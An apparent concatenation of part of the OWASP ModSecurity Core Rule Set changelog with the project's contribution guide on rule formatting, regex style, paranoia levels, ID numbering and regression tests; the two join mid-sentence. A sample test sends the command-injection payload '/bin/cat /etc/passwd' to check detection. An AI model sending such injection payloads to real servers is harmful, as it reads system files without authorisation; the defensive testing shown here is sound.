Fixed unescaped double-quote issue in Comment SPAM UA rule. + https://www.modsecurity.org/tracker/browse/CORERULES-9 + + +## Version 2.0.0 - 2009-07-29 + + +New Rules & Features: +* Fine Grained Policy + The rules have been split to having one signature per rule instead of having + all signatures combined into one optimized regular expression. + This should allow you to modify/disable events based on specific patterns + instead of having to deal with the whole rule. +* Converted Snort Rules + Emerging Threat web attack rules have been converted. + http://www.emergingthreats.net/ +* Anomaly Scoring Mode Option + The rules have been updated to include anomaly scoring variables which allow + you to evaluate the score at the end of phase:2 and phase:5 and decide on what + logging and disruptive actions to take based on the score. +* Correlated Events + There are rules in phase:5 that will provide some correlation between inbound + events and outbound events and will provide a result of successful atttack or + attempted attack. +* Updated Severity Ratings + The severity ratings in the rules have been updated to the following: + - 0: Emergency - is generated from correlation where there is an inbound attack and + an outbound leakage. + - 1: Alert - is generated from correlation where there is an inbound attack and an + outbound application level error. + - 2: Critical - is the highest severity level possible without correlation. It is + normally generated by the web attack rules (40 level files). + - 3: Error - is generated mostly from outbound leakabe rules (50 level files). + - 4: Warning - is generated by malicious client rules (35 level files). + - 5: Notice - is generated by the Protocol policy and anomaly files. + - 6: Info - is generated by the search engine clients (55 marketing file). +* Updated Comment SPAM Protections + Updated rules to include RBL lookups and client fingerprinting concepts from + Bad Behavior (www.bad-behavior.ioerror.us) +* Creation of Global Collection + Automatically create a Global collection in the *10* config file. Other rules + can then access it. +* Use of Block Action + Updated the rules to use the "block" action. This allows the Admin to globally + set the desired block action once with SecDefaultAction in the *10* config file + rather than having to edit the disruptive actions in all of the rules or for + the need to have multiple versions of the rules (blocking vs. non-blocking). +* "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." + http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html +* Added new generic RFI detection rules. + http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html +* "Possibly malicious iframe tag in output" (Rules 981001,981002) + Planting invisible iframes in a site can be used by attackers to point users + from the victim site to their malicious site. This is actually as if the + user was visiting the attacker's site himself, causing the user's browser to + process the content in the attacker's site. + +New Events: +* Rule 960019 - Expect Header Not Allowed. +* Rule 960020 - Pragma Header Requires Cache-Control Header +* Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character + as it is reserved for use as a fragment identifier within the html page. +* Rule 958291 - Range: field exists and begins with 0. +* Rule 958292 - Invalid Request Header Found. +* Rule 958293 - Lowercase Via Request Header Found. +* Rule 958294 - Common SPAM Proxies found in Via Request Header. +* Rule 958295 - Multiple/Conflicting Connection Header Data Found. +* Rule 958296 - Request Indicates a SPAM client accessed the Site. +* Rule 958297 - Common SPAM/Email Harvester crawler. +* Rule 958298 - Common SPAM/Email Harvester crawler + +Bug Fixes: +* Rule 950107 - Split the rule into 2 separate rules to factor in the + Content-Type when inspecting the REQUEST_BODY variable. +* Rule 960017 - Bug fix for when having port in the host header. +* Rule 960014 - Bug fix to correlate the SERVER_NAME variable. +* Rule 950801 - Increased the logic so that the rule will only run if the web site + uses UTF-8 Encoding. +* Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and + allow the IPv6 loopback address +* Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG + and to identify offsite hosts by comparing the ARG URI to the Host + header. Due to this rule now being stronger, moved it from optional + tight security rule to *40* generic attacks file. + +Other Fixes: +* Added more HTTP Protocol violations to *20* file. +* Set the SecDefaultAction in the *10* config file to log/pass (This was the + default setting, however this sets it explicitly. +* Added SecResponseBodyLimitAction ProcessPartial to the *10* config file. This + was added so that when running the SecRuleEngine in DetectionOnly mode, it will + not deny response bodies that go over the size restrictions. +* Changed SecServerSignature to "Apache/1.3.28" +* Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have + BEGIN and END SecMarkers for rule groups to more accurately allow moving to + proper locations. +* Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. + This removes the need for some SecAction/SkipAfter rules. +* Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier + rules and chained rules). + + +## Version 1.6.1 - 2008-04-22 + + +* Fixed a bug where phases and transformations where not specified explicitly + in rules. The issue affected a significant number of rules, and we strongly + recommend to upgrade. + + +## Version 1.6.0 - 2008-02-19 + + +New Rulesets & Features: +* 42 - Tight Security + This ruleset contains currently 2 rules which are considered highly prone + to FPs. They take care of Path Traversal attacks, and RFI attacks. This + ruleset is included in the optional_rulesets dir +* 42 - Comment Spam + Comment Spam is used by the spammers to increase their rating in search + engines by posting links to their site in other sites that allow posting + of comments and messages. The rules in this ruleset will work against that. + (Requires ModSecurity 2.5) +* Tags + A single type of attack is often detected by multiple rules. The new alert + classification tags solve this issue by providing an alternative alert type + indication and can serve for filtering and analysis of audit logs. + The classification tags are hierarchical with slashes separating levels. + Usually there are two levels with the top level describing the alert group + and the lower level denoting the alert type itself, for example: + WEB_ATTACK/SQL_INJECTION. + +False Positives Fixes: +* Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs +* Rule 950107 - Will look for invalid url decoding in variables that are not + automatically url decoded + +Additional rules logic: +* Using the new "logdata" action for logging the matched signature in rules +* When logging an event once, init the collection only if the alert needs to log +* Using the new operator @pm as a qualifier before large rules to enhance + performance (Requires ModSecurity 2.5) +* SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not + only 1=1. (Thanks to Marc Stern for the idea) +* New XSS signatures - iframe & flash XSS + + + +## Version 1.5.1 - 2007-12-06 + + +False Positives Fixes: +* Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) + +New Events: +* 960019 - Detect HTTP/0.9 Requests + HTTP/0.9 request are not common these days. This rule will log by default, + and block in the blocking version of file 21 + +Other Fixes: +* File 40, Rules 950004,950005 - Repaired the correction for the double + url decoding problem +* File 55 contained empty regular expressions. Fixed. + + +## Version 1.5 - 2007-11-23 + + +New Rulesets: +* 23 - Request Limits + "Judging by appearances". This rulesets contains rules blocking based on + the size of the request, for example, a request with too many arguments + will be denied. + +Default policy changes: +* XML protection off by default +* BLOCKING dir renamed to optional_rules +* Ruleset 55 (marketing) is now optional (added to the optional_rules dir) +* Ruleset 21 - The exception for apache internal monitor will not log anymore + +New Events: +* 960912 - Invalid request body + Malformed content will not be parsed by modsecurity, but still there might + be applications that will parse it, ignoring the errors. +* 960913 - Invalid Request + Will trigger a security event when request was rejected by apache with + code 400, without going through ModSecurity rules. + +Additional rules logic: +* 950001 - New signature: delete from +* 950007 - New signature: waitfor delay + +False Positives Fixes: +* 950006 - Will not be looking for /cc pattern in User-Agent header +* 950002 - "Internet Explorer" signature removed +* Double decoding bug used to cause FPs. Some of the parameters are already + url-decoded by apache. This caused FPs when the rule performed another + url-decoding transformation. The rules have been split so that parameters + already decoded by apache will not be decoded by the rules anymore. +* 960911 - Expression is much more permissive now +* 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, + then you should uncomment this rule (in file 20) + + +version 1.4.3 - 2007-07-21 + + +New Events: +* 950012 - HTTP Request Smuggling + For more info on this attack: + http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf +* 960912 - Invalid request body + Malformed content will not be parsed by modsecurity, but still there might + be applications that will parse it, ignoring the errors. +* 960913 - Invalid Request + Will trigger a security event when request was rejected by apache with + code 400, without going through ModSecurity rules. + +False Positives Fixes: +* 950107 - Will allow a % sign in the middle of a string as well +* 960911 - A more accurate expression based on the rfc: + http://www.ietf.org/rfc/rfc2396.txt +* 950015 - Will not look for http/ pattern in the request headers + +Additional rules logic: +* Since Apache applies scope directives only after ModSecurity phase 1 + this directives cannot be used to exclude phase 1 rules. Therefore + we moved all inspection rules to phase 2. + + + +version 1.4 build 2 - 2007-05-17 + + +New Feature: +* Search for signatures in XML content + XML Content will be parsed and ispected for signatures + +New Events: +* 950116 - Unicode Full/Half Width Abuse Attack Attempt + Full-width unicode can by used to bypass content inspection. Such encoding will be forbidden + http://www.kb.cert.org/vuls/id/739224 +* 960911 - Invalid HTTP request line + Enforce request line to be valid, i.e.: +* 960904 - Request Missing Content-Type (when there is content) + When a request contains content, the content-type must be specified. If not, the content will not be inspected +* 970018 - IIS installed in default location (any drive) + Log once if IIS in installed in the /Inetpub directory (on any drive, not only C) +* 950019 - Email Injection + Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails + +Regular expressions fixes: +* Further optimization of some regular expressions (using the non-greediness operator) + The non-greediness operator, , prevents excessive backtracking + +FP fixes: +* Rule 950107 - Will allow a parameter to end in a % sign from now on + + +version 1.4 - 2007-05-02 + + +New Events: +* 970021 - WebLogic information disclosure + Matching of "JSP compile error" in the response body, will trigger this rule, with severity 4 (Warning) +* 950015,950910,950911 - HTTP Response Splitting + Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: + http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf +ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: +* 960902 - Content-Encoding in request not supported + Any incoming compressed request will be denied +* 960903 - Content-Encoding in response not supported + An outgoing compressed response will be logged to alert, but ONLY ONCE. + +False Positives Fixes: +* Removed <.exe>,<.shtml> from restricted extensions +* Will not be looking for SQL Injection signatures , in the Via request header +* Excluded Referer header from SQL injection, XSS and command injection rules +* Excluded X-OS-Prefs header from command injection rule +* Will be looking for command injection signatures in + REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. +* Allowing charset specification in the Content-Type + +Additional rules logic: +* Corrected match of OPTIONS method in event 960015 +* Changed location for event 960014 (proxy access) to REQUEST_URI_RAW +* Moved all rules apart from method inspection from phase 1 to phase 2 - + This will enable viewing content if such a rule triggers as well as setting + exceptions using Apache scope tags. +* Added match for double quote in addition to single quote for signature (SQL Injection) +* Added 1=1 signature (SQL Injection) + + +version 1.3.2 build 4 2007-01-17 + + +Fixed apache 2.4 dummy requests exclusion +Added persistent PDF UXSS detection rule + + +## Version 1.3.2 build 3 2007-01-10 + + +Fixed regular expression in rule 960010 (file #30) to allow multipart form data +content + + +## Version 1.3.2 - 2006-12-27 + + +New events: +* 960037 Directory is restricted by policy +* 960038 HTTP header is restricted by policy + +Regular expressions fixes: +* Regular expressions with @ at end of beginning (for example "@import) +* Regular expressions with un-escaped "." +* Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) +* The command injection wget is not searched in the UA header as it has different meaning there. +* LDAP Fixed to reduce FPs: + + More accurate regular expressions + + high bit characters not accepted between signature tokens. +* Do not detect The CRS project values third party contributions. To make the contribution process as easy as possible, a helpful set of contribution guidelines are in place which all contributors and developers are asked to adhere to. + +## Getting Started with a New Contribution + +1. Sign in to [GitHub](https://github.com/join). +2. Open a [new issue](https://github.com/coreruleset/coreruleset/issues) for the contribution, *assuming a similar issue doesn't already exist*. + * **Clearly describe the issue**, including steps to reproduce if reporting a bug. + * **Specify the CRS version in question** if reporting a bug. + * Bonus points for submitting tests along with the issue. +3. Fork the repository on GitHub and begin making changes there. +4. Signed commits are preferred. (For more information and help with this, refer to the [GitHub documentation](https://docs.github.com/en/authentication/managing-commit-signature-verification/signing-commits)). + +## Making Changes + +* Base any changes on the latest dev branch (e.g., `v4.0/dev`). +* Create a topic branch for each new contribution. +* Fix only one problem at a time. This helps to quickly test and merge submitted changes. If intending to fix *multiple unrelated problems* then use a separate branch for each problem. +* Make commits of logical units. +* Make sure commits adhere to the contribution guidelines presented in this document. +* Make sure commit messages follow the [standard Git format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html). +* Make sure changes are submitted as a pull request (PR) on [GitHub](https://github.com/coreruleset/coreruleset/pulls). + * PR titles should follow the [Conventional Commits format](https://www.conventionalcommits.org/en/v1.0.0/), for example: `fix(rce): Fix a FP in rule 912345 with keyword 'time'`. + * If a PR only affects a single rule then the rule ID should be included in the title. + * If a PR title does not follow the correct format then a CRS developer will fix it. + +## General Formatting Guidelines for Rules Contributions + +* American English should be used throughout. +* 4 spaces should be used for indentation (no tabs). +* Files must end with a single newline character. +* No trailing whitespace at EOL. +* No trailing blank lines at EOF (only the required single EOF newline character is allowed). +* Adhere to an 80 character line length limit where possible. +* Add comments where possible and clearly explain any new rules. +* Comments must not appear between chained rules and should instead be placed before the start of a rule chain. +* All [chained rules](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#chain) should be indented like so, for readability: +``` +SecRule .. .. \ + "..." + SecRule .. .. \ + "..." + SecRule .. .. \ + "..." +``` +- Action lists in rules must always be enclosed in double quotes for readability, even if there is only one action (e.g., use `"chain"` instead of `chain`, and `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`). +- Always use numbers for phases instead of names. +- Format all use of `SecMarker` using double quotes, using UPPERCASE, and separating words with hyphens. For example: +``` +SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION" +SecMarker "END-REQUEST-910-IP-REPUTATION" +``` +- Rule actions should appear in the following order, for consistency: +``` +id +phase +allow | block | deny | drop | pass | proxy | redirect +status +capture +t:xxx +log +nolog +auditlog +noauditlog +msg +logdata +tag +sanitiseArg +sanitiseRequestHeader +sanitiseMatched +sanitiseMatchedBytes +ctl +ver +severity +multiMatch +initcol +setenv +setvar +expirevar +chain +skip +skipAfter +``` +- Rule operators must always be explicitly specified. Although ModSecurity defaults to using the `@rx` operator, for clarity `@rx` should always be explicitly specified when used. For example, write: +``` +SecRule ARGS "@rx foo" "id:1,phase:1,pass,t:none" +``` +instead of +``` +SecRule ARGS "foo" "id:1,phase:1,pass,t:none" +``` + +## Variable Naming Conventions + +* Variable names should be lowercase and should use the characters a-z, 0-9, and underscores only. +* To reflect the different syntax between *defining* a variable (using `setvar`) and *using* a variable, the following visual distinction should be applied: + * **Variable definition:** Lowercase letters for collection name, dot as the separator, variable name. E.g.: `setvar:tx.foo_bar_variable` + * **Variable use:** Capital letters for collection name, colon as the separator, variable name. E.g.: `SecRule TX:foo_bar_variable` + +## Writing Regular Expressions + +* Use the following character class, in the stated order, to cover alphanumeric characters plus underscores and hyphens: `[a-zA-Z0-9_-]` + +### Portable Backslash Representation + +CRS uses `\x5c` to represent the backslash `\` character in regular expressions. Some of the reasons for this are: + +* It's portable across web servers and WAF engines: it works with Apache, Nginx, and Coraza. +* It works with the [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/) for building optimized regular expressions. + +The older style of representing a backslash using the character class `[\\\\]` must _not_ be used. This was previously used in CRS to get consistent results between Apache and Nginx, owing to a quirk with how Apache would "double un-escape" character escapes. For future reference, the decision was made to stop using this older method because: + +* It can be confusing and difficult to understand how it works. +* It doesn't work with [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/). +* It doesn't work with Coraza. +* It isn't obvious how to use it in a character class, e.g., `[a-zA-Z]`. + +### Forward Slash Representation + +CRS uses literal, *unescaped* forward slash `/` characters in regular expressions. + +Regular expression engines and libraries based on PCRE use the forward slash `/` character as the default delimiter. As such, forward slashes are often escaped in regular expression patterns. In the interests of readability, CRS does *not* escape forward slashes in regular expression patterns, which may seem unusual at first to new contributors. + +If testing a CRS regular expression using a third party tool, it may be useful to change the delimiter to something other than `/` if a testing tool raises errors because a CRS pattern features unescaped forward slashes. + +### When and Why to Anchor Regular Expressions + +Engines running the OWASP Core Rule Set will use regular expressions to _search_ the input string, i.e., the regular expression engine is asked to find the first match in the input string. If an expression needs to match the entire input then the expression must be anchored appropriately. + +#### Beginning of String Anchor (^) + +It is often necessary to match something at the start of the input to prevent false positives that match the same string in the middle of another argument, for example. Consider a scenario where the goal is to match the value of `REQUEST_HEADERS:Content-Type` to `multipart/form-data`. The following regular expression could be used: + +```python +"@rx multipart/form-data" +``` + +HTTP headers can contain multiple values, and it may be necessary to guarantee that the value being searched for is the _first_ value of the header. There are different ways to do this but the simplest one is to use the `^` caret anchor to match the beginning of the string: + +```python +"@rx ^multipart/form-data" +``` + +It will also be useful to ignore case sensitivity in this scenario: + +```python +"@rx (?i)^multipart/form-data" +``` + +#### End of String Anchor ($) + +Consider, for example, needing to find the string `/admin/content/assets/add/evil` in the `REQUEST_FILENAME`. This could be achieved with the following regular expression: + +```python +"@rx /admin/content/assets/add/evil" +``` + +If the input is changed, it can be seen that this expression can easily produce a false positive: `/admin/content/assets/add/evilbutactuallynot/nonevilfile`. If it is known that the file being searched for can't be in a subdirectory of `add` then the `$` anchor can be used to match the end of the input: + +```python +"@rx /admin/content/assets/add/evil$" +``` + +This could be made a bit more general: + +```python +"@rx /admin/content/assets/add/[a-z]+$" +``` + +#### Matching the Entire Input String + +It is sometimes necessary to match the entire input string to ensure that it _exactly_ matches what is expected. It might be necessary to find the "edit" action transmitted by WordPress, for example. To avoid false positives on variations (e.g., "myedit", "the edit", "editable", etc.), the `^` caret and `$` dollar anchors can be used to indicate that an exact string is expected. For example, to only match the _exact_ strings `edit` or `editpost`: + +```python +"@rx ^(?:edit|editpost)$" +``` + +#### Other Anchors + +Other anchors apart from `^` caret and `$` dollar exist, such as `\A`, `\G`, and `\Z` in PCRE. CRS **strongly discourages** the use of other anchors for the following reasons: + +- Not all regular expression engines support all anchors and the OWASP Core Rule Set should be compatible with as many regular expression engines as possible. +- Their function is sometimes not trivial. +- They aren't well known and would require additional documentation. +- In most cases that would justify their use the regular expression can be transformed into a form that doesn't require them, or the rule can be transformed (e.g., with an additional chain rule). + +### Use Capture Groups Sparingly + +Capture groups, i.e., parts of the regular expression surrounded by parentheses (`(` and `)`), are used to store the matched information from a string in memory for later use. Capturing input uses both additional CPU cycles and additional memory. In many cases, parentheses are *mistakenly* used for grouping and ensuring precedence. + +To group parts of a regular expression, or to ensure that the expression uses the precedence required, surround the concerning parts with `(?:` and `)`. Such a group is referred to as being "non-capturing". The following will create a capture group: + +```python +"@rx a|(b|c)d" +``` + +On the other hand, this will create a _non-capturing_ group, guaranteeing the precedence of the alternative _without_ capturing the input: + +```python +"@rx a|(?:b|c)d" +``` + +### Lazy Matching + +The question mark `?` can be used to turn "greedy" quantifiers into "lazy" quantifiers, i.e., `.+` and `.*` are greedy while `.+?` and `.*?` are lazy. Using lazy quantifiers can help with writing certain expressions that wouldn't otherwise be possible. However, in backtracking regular expression engines, like PCRE, lazy quantifiers can also be a source of performance issues. The following is an example of an expression that uses a lazy quantifier: + +```python +"@rx (?i)\.cookie\b.*?;\W*?(?:expires|domain)\W*?=" +``` + +This expression matches cookie values in HTML to detect session fixation attacks. The input string could be `document.cookie = "name=evil; domain=https://example.com";`. + +The lazy quantifiers in this expression are used to reduce the amount of backtracking that engines such as PCRE have to perform (others, such as RE2, are not affected by this). Since the asterisk `*` is greedy, `.*` would match every character in the input up to the end, at which point the regular expression engine would realize that the next character, `;`, can't be matched and it will backtrack to the previous position (`;`). A few iterations later, the engine will realize that the character `d` from `domain` can't be matched and it will backtrack again. This will happen again and again, until the `;` at `evil;` is found. Only then can the engine proceed with the next part of the expression. + +Using lazy quantifiers, the regular expression engine will instead match _as few characters as possible_. The engine will match ` ` (a space), then look for `;` and will not find it. The match will then be expanded to ` =` and, again, a match of `;` is attempted. This continues until the match is ` = "name=evil` and the engine finds `;`. While lazy matching still includes some work, in this case, backtracking would require many more steps. + +Lazy matching can have the inverse effect, though. Consider the following expression: + +```python +"@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" +``` + +It matches some HTML attributes and then expects to see `=`. Using a somewhat contrived input, the lazy quantifier will require more steps to match then the greedy version would: `style                     =`. With the lazy quantifier, the regular expression engine will expand the match by one character for each of the space characters in the input, which means 21 steps in this case. With the greedy quantifier, the engine would match up to the end in a single step, backtrack one character and then match `=` (note that `=` is included in `[\s\S]`), which makes 3 steps. + +To summarize: **be very mindful about when and why you use lazy quantifiers in your regular expressions**. + +### Possessive Quantifiers and Atomic Groups + +Lazy and greedy matching change the order in which a regular expression engine processes a regular expression. However, the order of execution does not influence the backtracking behavior of backtracking engines. + +Possessive quantifiers (e.g., `x++`) and atomic groups (e.g., `(?>x)`) are tools that can be used to prevent a backtracking engine from backtracking. They _can_ be used for performance optimization but are only supported by backtracking engines and, therefore, are not permitted in CRS rules. + +### Writing Regular Expressions for Non-Backtracking Compatibility + +Traditional regular expression engines use backtracking to solve some additional problems, such as finding a string that is preceded or followed by another string. While this functionality can certainly come in handy and has its place in certain applications, it can also lead to performance issues and, in uncontrolled environments, open up possibilities for attacks (the term "[ReDoS](https://en.wikipedia.org/wiki/ReDoS)" is often used to describe an attack that exhausts process or system resources due to excessive backtracking). + +The OWASP Core Rule Set tries to be compatible with non-backtracking regular expression engines, such as RE2, because: + +- Non-backtracking engines are less vulnerable to ReDoS attacks. +- Non-backtracking engines can often outperform backtracking engines. +- CRS aims to leave the choice of the engine to the user/system. + +To ensure compatibility with non-backtracking regular expression engines, the following operations are **not** permitted in regular expressions: + +- positive lookahead (e.g., `(?=regex)`) +- negative lookahead (e.g., `(?!regex)`) +- positive lookbehind (e.g., `(?<=regex)`) +- negative lookbehind (e.g., `(?regex)`) +- backreferences (e.g., `\1`) +- named backreferences (e.g., `(?P=name)`) +- conditionals (e.g., `(?(regex)then|else)`) +- recursive calls to capture groups (e.g., `(?1)`) +- possessive quantifiers (e.g., `(?:regex)++`) +- atomic (or possessive) groups (e.g., `(?>regex`)) + +This list is not exhaustive but covers the most important points. The [RE2 documentation](https://github.com/google/re2/wiki/Syntax) includes a complete list of supported and unsupported features that various engines offer. + +### When and How to Optimize Regular Expressions + +Optimizing regular expressions is hard. Often, a change intended to improve the performance of a regular expression will change the original semantics by accident. In addition, optimizations usually make expressions harder to read. Consider the following example of URL schemes: + +```python +mailto|mms|mumble|maven +``` + +An optimized version (produced by the [crs-toolchain]({{< ref "crs_toolchain" >}})) could look like this: + +```python +m(?:a(?:ilto|ven)|umble|ms) +``` + +The above expression is an optimization because it reduces the number of backtracking steps when a branch fails. The regular expressions in the CRS are often comprised of lists of tens or even hundreds of words. Reading such an expression in an optimized form is difficult: even the _simple_ optimized example above is difficult to read. + +In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain]({{< ref "crs_toolchain" >}}) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above. + +Whether optimizations make sense in a contribution is assessed for each case individually. + +## Rules Compliance with Paranoia Levels + +The rules in CRS are organized into **paranoia levels** (PLs) which makes it possible to define how aggressive CRS is. See the documentation on [paranoia levels](https://coreruleset.org/docs/concepts/paranoia_levels/) for an introduction and more detailed explanation. + +Each rule that is placed into a paranoia level must contain the tag `paranoia-level/N`, where *N* is the PL value, however this tag can only be added if the rule does **not** use the nolog action. + +The types of rules that are allowed at each paranoia level are as follows: + +**PL 0:** + +* ModSecurity / WAF engine installed, but almost no rules + +**PL 1:** + +* Default level: keep in mind that most installations will normally use this level +* Any complex, memory consuming evaluation rules will surely belong to a higher level, not this one +* CRS will normally use atomic checks in single rules at this level +* Confirmed matches only; all scores are allowed +* No false positives / low false positives: try to avoid adding rules with potential false positives! +* False negatives could happen + +**PL 2:** + +* [Chain](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-%28v2.x%29#chain) usage is allowed +* Confirmed matches use score critical +* Matches that cause false positives are limited to using scores notice or warning +* Low false positive rates +* False negatives are not desirable + +**PL 3:** + +* Chain usage with complex regular expression look arounds and macro expansions are allowed +* Confirmed matches use scores warning or critical +* Matches that cause false positives are limited to using score notice +* False positive rates are higher but limited to multiple matches (not single strings) +* False negatives should be a very unlikely accident + +**PL 4:** + +* Every item is inspected +* Variable creations are allowed to avoid engine limitations +* Confirmed matches use scores notice, warning, or critical +* Matches that cause false positives are limited to using scores notice or warning +* False positive rates are higher (even on single strings) +* False negatives should not happen at this level +* Check everything against RFCs and allow listed values for the most popular elements + +## ID Numbering Scheme + +The CRS project uses the numerical ID rule namespace from 900,000 to 999,999 for CRS rules, as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages and plugins. + +- Rules applying to the **incoming request** use the ID range 900,000 to 949,999. +- Rules applying to the **outgoing response** use the ID range 950,000 to 999,999. + +The rules are grouped by the vulnerability class they address (SQLi, RCE, etc.) or the functionality they provide (e.g., initialization). These groups occupy blocks of thousands (e.g., SQLi: 942,000 - 942,999). These grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule IDs defined within the file (e.g., SQLi: `REQUEST-942-APPLICATION-ATTACK-SQLI.conf`). + +The individual rules within each file for a vulnerability class are organized by the paranoia level of the rules. PL 1 is first, then PL 2, etc. + +The ID block 9xx000 - 9xx099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block. + +Among the rules providing CRS helper functionality are rules that skip other rules depending on the paranoia level. These rules always use the following reserved rule IDs: 9xx011 - 9xx018, with very few exceptions. + +The blocking and filter rules start at 9xx100 with a step width of 10, e.g., 9xx100, 9xx110, 9xx120, etc. + +The ID of a rule does not correspond directly with its paranoia level. Given the size of rule groups and how they're organized by paranoia level (starting with the lower PL rules first), PL 2 and above tend to be composed of rules with higher ID numbers. + +### Stricter Siblings + +Within a rule file / block, there are sometimes smaller groups of rules that belong together. They're closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different *target* in a second rule, where this is necessary). These are **stricter siblings** of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one, e.g., a base rule at 9xx160 and a stricter sibling at 9xx161. + +Stricter siblings often have different paranoia levels. This means that the base rule and the stricter siblings don't usually reside next to each another in the rule file. Instead, they're ordered by paranoia level and are linked by the first digits of their rule IDs. It's good practice to introduce all stricter siblings together as part of the definition of the base rule: this can be done in the comments of the base rule. It's also good practice to refer back to the base rule with the keywords "stricter sibling" in the comments of the stricter siblings themselves. For example: "...This is performed in two separate stricter siblings of this rule: 9xxxx1 and 9xxxx2", and "This is a stricter sibling of rule 9xxxx0." + +## Writing Tests + +Each rule should be accompanied by tests. Rule tests are an invaluable way to check that a rule behaves as expected: + +- Does the rule correctly match against the payloads and behaviors that the rule is designed to detect? (**Positive tests**) +- Does the rule correctly **not** match against legitimate requests, i.e., the rule doesn't cause obvious false positives? (**Negative tests**) + +Rule tests also provide an excellent way to test WAF engines and implementations to ensure they behave and execute CRS rules as expected. + +The rule tests are located under `tests/regression/tests`. Each CRS rule *file* has a corresponding *directory* and each individual *rule* has a corresponding *YAML file* containing all the tests for that rule. For example, the tests for rule 911100 *(Method is not allowed by policy)* are in the file `REQUEST-911-METHOD-ENFORCEMENT/911100.yaml`. + +Full documentation of the required formatting and available options of the YAML tests can be found at https://github.com/coreruleset/ftw/blob/main/docs/YAMLFormat.md. + +Documentation on how to run the CRS test suite can be found in the [online documentation](https://coreruleset.org/docs/development/testing/). + +### Positive Tests + +Example of a simple *positive test*: + +```yaml +- test_title: 932230-26 + desc: "Unix command injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932230" +``` + +This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. + +It's important that tests consistently include the HTTP header fields `Host`, `User-Agent`, and `Accept`. CRS includes rules that detect if these headers are missing or empty, so these headers should be included in each test to avoid unnecessarily causing those rules to match. Ideally, *each positive test should cause* **only** *the rule in question to match*. + +The rule's description field, `desc`, is important. It should describe what is being tested: what *should* match, what should *not* match, etc. + +### Negative Tests + +Example of a simple *negative test*: + +```yaml +- test_title: 932260-4 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + no_log_contains: id "932260" +``` + +This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. + +### Encoded and Raw Requests + +It is possible to *encode* an entire test request. This encapsulates the request and means that the request headers and payload don't need to be explicitly declared. This is useful when a test request needs to use unusual bytes which might break YAML parsers, or when a test request must be intentionally malformed in a way that is impossible to describe otherwise. An encoded request is sent exactly as intended. + +The `encoded_request` field works like so: + +```yaml +encoded_request: +``` + +For example: +```yaml +encoded_request: "R0VUIFwgSFRUUA0KDQoK" +``` + +where `R0VUIFwgSFRUUA0KDQoK` is the base64-encoded equivalent of `GET \ HTTP\r\n\r\n`. + +The older method of using `raw_request` is deprecated as it's difficult to maintain and less portable than `encoded_request`. + +### Using The Correct HTTP Endpoint + +The CRS project uses [kennthreitz/httpbin](https://hub.docker.com/r/kennethreitz/httpbin) as the backend server for tests. This backend provides one dedicated endpoint for each HTTP method. Tests should target these endpoints to: + +- improve test throughput (prevent HTML from being returned by the backend) +- add automatic HTTP method verification (the backend will respond with status code `405` (method not allowed) to requests whose method does not match the endpoint) + +Test URIs should be structured as follows, where `` must be replaced by the name of the HTTP method the test uses: + +```yaml +#... + method: + uri: //some/arbitrary/url +#... +``` + +## Further Guidance on Rule Writing + +### Leaving Audit Log Configuration Unchanged + +Former versions of CRS dynamically included the HTTP response body in the audit log via special `ctl` statements on certain individual response rules. This was never applied in a systematic way and, regardless, CRS should not change the format of the audit log by itself, namely because this can lead to information leakages. Therefore, the use of `ctl:auditLogParts=+E` or any other form of `ctl:auditLogParts` is not allowed in CRS rules. + +## Non-Rules General Guidelines + +* Remove trailing spaces from files (if they're not needed). This will make linters happy. +* EOF should have an EOL. + +The `pre-commit` 